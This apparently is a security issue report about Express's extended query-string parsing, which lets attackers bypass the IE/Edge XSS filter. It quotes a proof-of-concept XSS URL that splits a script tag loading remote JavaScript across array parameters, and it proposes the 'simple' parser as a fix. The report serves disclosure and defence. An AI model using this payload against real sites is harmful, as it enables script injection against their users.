Description
I created a simple browser-based XSS filter test app here:
http://xss.untrusted.com/xss?id=aaa&id=bbb
This is page is simple enough that pretty much any filter bypass bug present here would be legitimate. That is, the identified bypass condition would have to be in-scope as an issue for the filter to defend against.
Masato Kinugawa was able to bypass the IE / Edge XSS filter using the following trick:
http://xss.untrusted.com/xss?id[0]=%3Cscript/&id[1]=/src=//html5sec.org/test.js%3E%3C/script%3E
This relies on the extended query string parsing that is enabled by default in express.
I was able to fix my test app by manually disabling the extended query string parsing:
app.set('query parser', 'simple');
While it's certainly not the responsibility of express to make the IE / Edge XSS Filter's job any easier, disabling the extended query parsing by default would be one way to solve this issue for the filter.
Adam Baldwin alerted me to this issue and FWIW he is also in favor of changing the default query parser to 'simple': https://twitter.com/adam_baldwin/status/884633562292428800
Disclosure: Though I'm currently employed by Google, in a previous life I worked at Microsoft developing the IE / Edge XSS Filter.